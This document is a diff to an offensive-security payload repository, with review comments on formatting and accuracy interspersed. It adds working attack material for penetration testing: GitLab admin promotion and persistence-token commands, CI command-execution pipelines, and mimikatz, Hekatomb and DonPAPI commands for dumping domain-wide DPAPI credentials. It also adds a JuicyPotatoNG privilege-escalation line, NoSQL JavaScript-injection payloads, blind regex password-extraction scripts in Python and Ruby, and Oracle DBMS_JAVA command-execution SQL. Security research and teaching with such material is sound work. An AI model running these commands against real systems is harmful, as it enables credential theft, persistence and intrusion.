* Search for files in repositories containing a given keyword in the file name in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term"
|
||||
SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term"
|
||||
```
|
||||
* List snippets owned by the current user in GitLab
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local
|
||||
SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local
|
||||
```
|
||||
* List all GitLab runners available to the current user in GitLab
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local
|
||||
SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local
|
||||
```
|
||||
* Get the assigned privileges to an access token being used in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
|
||||
```
|
||||
* Promote a normal user to an administrative role in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName
|
||||
SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName
|
||||
SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName
|
||||
```
|
||||
* Create/List/Delete an access token to be used in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName
|
||||
SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName
|
||||
SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID
|
||||
SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser
|
||||
SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser
|
||||
```
|
||||
* Create/List an SSH key to be used in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key"
|
||||
SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key"
|
||||
SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://github.something.local
|
||||
SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://github.something.local
|
||||
SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID
|
||||
SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID
|
||||
```
|
||||
|
||||
## Personal Access Token
|
||||
|
||||
Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance.
|
||||
|
||||
```ps1
|
||||
curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens"
|
||||
```
|
||||
|
||||
## Exploit Gitlab CI/Github Actions
|
||||
|
||||
* Gitlab-CI "Command Execution" example: `.gitlab-ci.yml`
|
||||
```yaml
|
||||
stages:
|
||||
- test
|
||||
|
||||
test:
|
||||
stage: test
|
||||
script:
|
||||
- |
|
||||
whoami
|
||||
parallel:
|
||||
matrix:
|
||||
- RUNNER: VM1
|
||||
- RUNNER: VM2
|
||||
- RUNNER: VM3
|
||||
tags:
|
||||
- ${RUNNER}
|
||||
```
|
||||
* Github Action "Command Execution" example: `.github/workflows/example.yml`
|
||||
```yml
|
||||
name: example
|
||||
on:
|
||||
workflow_dispatch:
|
||||
push:
|
||||
branches: [ main ]
|
||||
pull_request:
|
||||
branches: [ main ]
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: windows-2019
|
||||
|
||||
steps:
|
||||
- name: Execute
|
||||
run: |
|
||||
whoami
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/)
|
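Review bot: the Summary list is out of sync with the file: it links Enumeration, Exploit Gitlab CI/Github Actions and References but omits the `## Personal Access Token` section that sits between them; add `* [Personal Access Token](#personal-access-token)`. The blockquote under the title is empty (a bare `>`), which is the slot the other files in this folder use for a one-line description (the `Windows - DPAPI.md` file added in this same commit has one); fill it or drop it. Consistency: the two `listsshkey` commands pass `-s gitlab` together with `https://github.something.local`, and the `-c` examples mix `apiKey`, `apikey` and `apiToken` for the same option, so pick one spelling.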
86
Methodology and Resources/Windows - DPAPI.md
Normal file
@ -0,0 +1,86 @@
|
||||
# Windows - DPAPI
|
||||
|
||||
> On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft's Data Protection API and stored as "blob" files in user AppData folder.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Data Protection API](#data-protection-api)
|
||||
* [List Credential Files](#list-credential-files)
|
||||
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
|
||||
* [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain)
|
||||
* [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely)
|
||||
|
||||
|
||||
## Data Protection API
|
||||
|
||||
* Outside of a domain: the user's `password hash` is used to encrypt these "blobs".
|
||||
* Inside a domain: the `domain controller's master key` is used to encrypt these blobs.
|
||||
|
||||
With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work
|
||||
stations in the domain.
|
||||
|
||||
```ps1
|
||||
vaultcmd /list
|
||||
|
||||
VaultCmd /listcreds:<namevault>|<guidvault> /all
|
||||
vaultcmd /listcreds:"Windows Credentials" /all
|
||||
```
|
||||
|
||||
### List Credential Files
|
||||
|
||||
```ps1
|
||||
dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
|
||||
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
|
||||
|
||||
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
|
||||
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
|
||||
```
|
||||
|
||||
|
||||
### Mimikatz - Credential Manager & DPAPI
|
||||
|
||||
```powershell
|
||||
# check the folder to find credentials
|
||||
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*
|
||||
|
||||
# check the file with mimikatz
|
||||
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
|
||||
# find master key
|
||||
mimikatz !sekurlsa::dpapi
|
||||
# use master key
|
||||
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
|
||||
|
||||
# find and export backup keys
|
||||
lsadump::backupkeys /system:dc01.lab.local /export
|
||||
# use backup keys
|
||||
dpapi::masterkey /in:"C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk
|
||||
```
|
||||
|
||||
### Hekatomb - Steal all credentials on domain
|
||||
|
||||
> [Processus-Thief/Hekatomb](https://github.com/Processus-Thief/HEKATOMB) is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials.
|
||||
|
||||
```python
|
||||
pip3 install hekatomb
|
||||
hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
|
||||
```
|
||||
|
||||
![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png)
|
||||
|
||||
### DonPAPI - Dumping DPAPI credz remotely
|
||||
|
||||
* [login-securite/DonPAPI](https://github.com/login-securite/DonPAPI)
|
||||
|
||||
```ps1
|
||||
DonPAPI.py domain/user:passw0rd@target
|
||||
DonPAPI.py --hashes <LM>:<NT> domain/user@target
|
||||
|
||||
# using domain backup key
|
||||
dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
|
||||
python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [DPAPI - Extracting Passwords - HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords)
|
||||
* [DON PAPI, OU L’ART D’ALLER PLUS LOIN QUE LE DOMAIN ADMIN - LoginSecurité - CORTO GUEGUEN - 4 MARS 2022](https://www.login-securite.com/2022/03/04/don-papi-ou-lart-daller-plus-loin-que-le-avec-dpapi/)
|
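Review bot: the two bullets under "Data Protection API" are imprecise and contradict the commands later in the same file: DPAPI blobs are encrypted with the user's master key, which is derived from the user's password, not with "the domain controller's master key"; in a domain the user's master keys are additionally wrapped with the domain backup key, which is exactly what `lsadump::backupkeys /system:dc01.lab.local /export` retrieves and `dpapi::masterkey ... /pvk:ntds_capi_0_...pvk` consumes. Suggest rewording the second bullet to "Inside a domain: the user's master keys are also protected with the domain backup key, so the DC's private key can decrypt every domain user's master key". Two smaller points: the sentence "...of all the work / stations in the domain" is broken across two lines mid-word and should read "workstations"; and the Hekatomb block is fenced as ```python while it contains shell commands (`pip3 install hekatomb`, `hekatomb -hashes ...`), so use ```ps1 or ```bash like the other blocks.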
@ -235,7 +235,6 @@ Attributes : 0
|
||||
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
||||
```
|
||||
|
||||
|
||||
## Mimikatz - Commands list
|
||||
|
||||
| Command |Definition|
|
||||
|
@ -956,9 +956,8 @@ Example: "Windows Help and Support" (Windows + F1), search for "command prompt",
|
||||
Look for vuln drivers loaded, we often don't spend enough time looking at this:
|
||||
|
||||
```powershell
|
||||
# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery
|
||||
|
||||
PS C:\Users\Swissky> driverquery.exe /fo table
|
||||
# Native binary
|
||||
PS C:\Users\Swissky> driverquery.exe /fo table /si
|
||||
Module Name Display Name Driver Type Link Date
|
||||
============ ====================== ============= ======================
|
||||
1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM
|
||||
@ -972,6 +971,7 @@ acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM
|
||||
ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM
|
||||
<SNIP>
|
||||
|
||||
# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery
|
||||
PS C:\Users\Swissky> DriverQuery.exe --no-msft
|
||||
[+] Enumerating driver services...
|
||||
[+] Checking file signatures...
|
||||
@ -1289,6 +1289,14 @@ C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs
|
||||
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
|
||||
```
|
||||
|
||||
### JuicyPotatoNG
|
||||
|
||||
* [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG)
|
||||
|
||||
```powershell
|
||||
JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt
|
||||
```
|
||||
|
||||
|
||||
## EoP - Privileged File Write
|
||||
|
||||
@ -1502,5 +1510,8 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
|
||||
* [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html)
|
||||
* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/)
|
||||
* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1)
|
||||
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
|
||||
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
|
||||
* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
|
||||
* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
|
||||
* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/)
|
||||
* [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/)
|
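Review bot: the Printer reference has a stray closing parenthesis in its title ("... - AUGUST 2, 2021)"), which renders as a literal `)` in the link text; drop it. That entry is also the only one in this hunk without an author, while the neighbouring entries name one (Simon Zuckerbraun, Ian, @decoder_it), so add the pentestlab.blog author for consistency. The Tarlogic entry being replaced by a copy with the date reformatted ("14 - JUN - 2018" to "14 JUN 2018") is fine.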
@ -20,3 +20,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||
';sleep(5000);'
|
||||
';sleep(5000);+'
|
||||
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
||||
';return 'a'=='a' && ''=='
|
||||
";return(true);var xyz='a
|
||||
0;return true
|
@ -11,6 +11,7 @@
|
||||
* [Extract data information](#extract-data-information)
|
||||
* [Blind NoSQL](#blind-nosql)
|
||||
* [POST with JSON body](#post-with-json-body)
|
||||
* [POST with urlencoded body](#post-with-urlencoded-body)
|
||||
* [GET](#get)
|
||||
* [MongoDB Payloads](#mongodb-payloads)
|
||||
* [References](#references)
|
||||
@ -19,6 +20,7 @@
|
||||
|
||||
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
|
||||
* [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab)
|
||||
* [Burp-NoSQLiScanner - Plugin available in burpsuite](https://github.com/matrix/Burp-NoSQLiScanner)
|
||||
|
||||
## Exploit
|
||||
|
||||
@ -70,11 +72,20 @@ Extract data with "in"
|
||||
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
||||
```
|
||||
|
||||
### SSJI
|
||||
|
||||
```json
|
||||
';return 'a'=='a' && ''=='
|
||||
";return 'a'=='a' && ''=='
|
||||
0;return true
|
||||
```
|
||||
|
||||
|
||||
## Blind NoSQL
|
||||
|
||||
### POST with JSON body
|
||||
|
||||
python script:
|
||||
|
||||
```python
|
||||
import requests
|
||||
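Review bot: the new `### SSJI` heading uses an abbreviation that appears nowhere else in the file; spell it out once ("Server-Side JavaScript Injection") so readers can tell it apart from the operator-based payloads (`$in`, `$gt`) above it. The block is fenced as ```json although its three lines are JavaScript fragments meant to be evaluated by the database, not JSON, so ```javascript would highlight them correctly. The same three payloads are also added to the `MongoDB Payloads` block later in this diff; consider keeping them in one place and linking to it.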
@ -100,6 +111,8 @@ while True:
|
||||
|
||||
### POST with urlencoded body
|
||||
|
||||
python script:
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
@ -124,6 +137,8 @@ while True:
|
||||
|
||||
### GET
|
||||
|
||||
python script:
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
@ -138,13 +153,40 @@ u='http://example.org/login'
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
||||
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
|
||||
payload=f"?username={username}&password[$regex]=^{password + c}"
|
||||
r = requests.get(u + payload)
|
||||
if 'Yeah' in r.text:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
print(f"Found one more char : {password+c}")
|
||||
password += c
|
||||
```
|
||||
|
||||
ruby script:
|
||||
|
||||
```ruby
|
||||
require 'httpx'
|
||||
|
||||
username = 'admin'
|
||||
password = ''
|
||||
url = 'http://example.org/login'
|
||||
# CHARSET = (?!..?~).to_a # all ASCII printable characters
|
||||
CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-'
|
||||
GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$']
|
||||
session = HTTPX.plugin(:persistent)
|
||||
|
||||
while true
|
||||
CHARSET.each do |c|
|
||||
unless GET_EXCLUDE.include?(c)
|
||||
payload = "?username=#{username}&password[$regex]=^#{password + c}"
|
||||
res = session.get(url + payload)
|
||||
if res.body.to_s.match?('Yeah')
|
||||
puts "Found one more char : #{password + c}"
|
||||
password += c
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
## MongoDB Payloads
|
||||
|
||||
```bash
|
||||
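Review bot: in the Ruby script the `GET_EXCLUDE` filter is dead code: `CHARSET` is restricted to `[*'0'..'9',*'a'..'z','-']`, none of which appear in `['*','+','.','?','|', '#', '&', '$']`, so `unless GET_EXCLUDE.include?(c)` never skips anything. Either use the full printable charset from the commented-out line (`(?!..?~).to_a`), where the exclusion matters because those characters are regex metacharacters or URL delimiters, or drop the filter. Like the Python version above it, the `while true` loop has no termination condition, so once no character extends `password` it spins forever; breaking out of the loop when a full pass over `CHARSET` adds nothing would make both scripts stop on their own.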
@ -165,6 +207,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||
{$gt: ''}
|
||||
[$ne]=1
|
||||
';return 'a'=='a' && ''=='
|
||||
";return(true);var xyz='a
|
||||
0;return true
|
||||
```
|
||||
|
||||
## References
|
||||
@ -173,3 +218,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||
* [Testing for NoSQL injection - OWASP/WSTG](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
|
||||
* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
|
||||
* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
|
||||
* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)
|
||||
|
@ -62,6 +62,15 @@ Applications that do not check for a valid CSRF token in the OAuth callback are
|
||||
|
||||
> The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
|
||||
|
||||
## Labs
|
||||
|
||||
* [Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow)
|
||||
* [Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking)
|
||||
* [OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri)
|
||||
* [Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page)
|
||||
* [Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
|
||||
|
@ -178,6 +178,10 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
|
||||
?continue={payload}
|
||||
?return_path={payload}
|
||||
```
|
||||
## Labs
|
||||
|
||||
* [DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
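Review bot: the `## Labs` heading is added directly after the closing ``` fence with no blank line between them, unlike the OAuth file in this same commit, which separates the heading from the preceding block; some Markdown renderers then attach the heading to the preceding paragraph, so add the blank line.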
26
README.md
@ -1,11 +1,15 @@
# Payloads All The Things [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
# Payloads All The Things

A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques !
Feel free to improve with your payloads and techniques !
I :heart: pull requests :)

You can also contribute with a :beers: IRL, or using the sponsor button.
You can also contribute with a :beers: IRL, or using the sponsor button

[![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo)
[![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)

An alternative display version is available at [PayloadsAllTheThingsWeb](https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/).

<p align="center">
<img src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/.github/banner.png">
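Review bot: the two versions of the sponsor sentence differ only in the trailing period ("...or using the sponsor button." versus "...or using the sponsor button"); keep the punctuated form, and while touching these lines drop the space before the exclamation mark in "Feel free to improve with your payloads and techniques !". The `<img>` in the `<p align="center">` block also has no `alt` attribute; `alt="PayloadsAllTheThings banner"` would do.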
@ -36,16 +40,17 @@ You might also like the `Methodology and Resources` folder :
- [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)
- [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
- [Subdomains Enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md)
- [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
- [Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md)
- [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
- [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
- [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
- [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)
- [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
- [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)


You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections.
You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/YOUTUBE.md) selections.


👨💻 Contributions
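Review bot: the `[CVE Exploits]` entry points at a top-level directory, not at a file under `Methodology and Resources`, yet it sits inside the list introduced by "You might also like the `Methodology and Resources` folder :"; move it out of that list or introduce it separately. The rewritten "You want more ? Check the [Books]..." line keeps the stray space before the question mark; it should read "You want more? Check the [Books]...".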
@ -58,4 +63,13 @@ Be sure to read [CONTRIBUTING.md](https://github.com/swisskyrepo/PayloadsAllTheT
</a>
</p>

Thanks again for your contribution! :heart:
Thanks again for your contribution! :heart:


🧙♂️ Sponsors
-----

This project is proudly sponsored by these companies.

[<img src="https://avatars.githubusercontent.com/u/48131541?s=40&v=4">](https://github.com/vaadata)
[<img src="https://avatars.githubusercontent.com/u/50994705?s=40&v=4">](https://github.com/projectdiscovery)
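Review bot: the two sponsor `<img>` tags have no `alt` text, so the links render as empty anchors for screen readers and when the avatar fetch fails; add `alt="Vaadata"` and `alt="ProjectDiscovery"` respectively, since the link targets already name the companies.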
@ -12,6 +12,15 @@

* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
* [Smuggler](https://github.com/defparam/smuggler)
* [Simple HTTP Smuggler Generator CL.TE TE.CL](https://github.com/dhmosfunk/simple-http-smuggler-generator) > this tool does not offer automated exploitation. You have to identify the injection point and exploit it manually!


## About CL.TE | TE.CL Vulnerabilities
If you want to exploit HTTP Requests Smuggling manually you will face some problems especially in TE.CL vulnerability you have to calculate the chunk size for the second request(malicious request) as portswigger suggests `Manually fixing the length fields in request smuggling attacks can be tricky.`. For that reason you can use the [Simple HTTP Smuggler Generator CL.TE TE.CL](https://github.com/dhmosfunk/simple-http-smuggler-generator) and exploit the CL.TE TE.CL vulnerabilities manually and learn how this vulnerability works and how you can exploit it. This tool offers you only the second request with a valid chunk size(TE.CL) auto-generated but does not offer automated exploitation. You have to identify the injection point and exploit it manually!






## CL.TE vulnerabilities


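Review bot: the "About CL.TE | TE.CL Vulnerabilities" paragraph is one run-on sentence that repeats, almost verbatim, the limitation already stated in the tool list entry ("does not offer automated exploitation. You have to identify the injection point and exploit it manually!"); say it once, split the paragraph into two or three sentences, and turn the quoted PortSwigger sentence into a link to the Academy page it comes from rather than an inline code span. The five consecutive blank lines before "## CL.TE vulnerabilities" should be collapsed to one.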
@ -15,6 +15,8 @@
* [Methods by DBMS](#methods-by-dbms)
* [References](#references)

:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%`

## HQL Comments

```sql
@ -134,7 +136,7 @@ public class Constants {

Some usable constants in well-known Java libraries:

```
```ps1
org.apache.batik.util.XMLConstants.XML_CHAR_APOS [ Apache Batik ]
com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE [ ICU4J ]
jodd.util.StringPool.SINGLE_QUOTE [ Jodd ]
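Review bot: the fence is retagged `ps1` but its body is a list of Java constant names with bracketed library names, not PowerShell; tag it `java` (or leave it untagged as before) so syntax highlighting does not mark the `[ Apache Batik ]` annotations as PowerShell type literals.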
@ -77,10 +77,37 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
```

## Oracle SQL Command execution
## Oracle SQL Command Execution

* [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat)

### Oracle Java Execution

* List Java privileges
```sql
select * from dba_java_policy
select * from user_java_policy
```
* Grant privileges
```sql
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
```
* Execute commands
* 10g R2, 11g R1 and R2: `DBMS_JAVA_TEST.FUNCALL()`
```sql
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
```
* 11g R1 and R2: `DBMS_JAVA.RUNJAVA()`
```sql
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
```


### Oracle Java Class

```sql
/* create Java class */
BEGIN
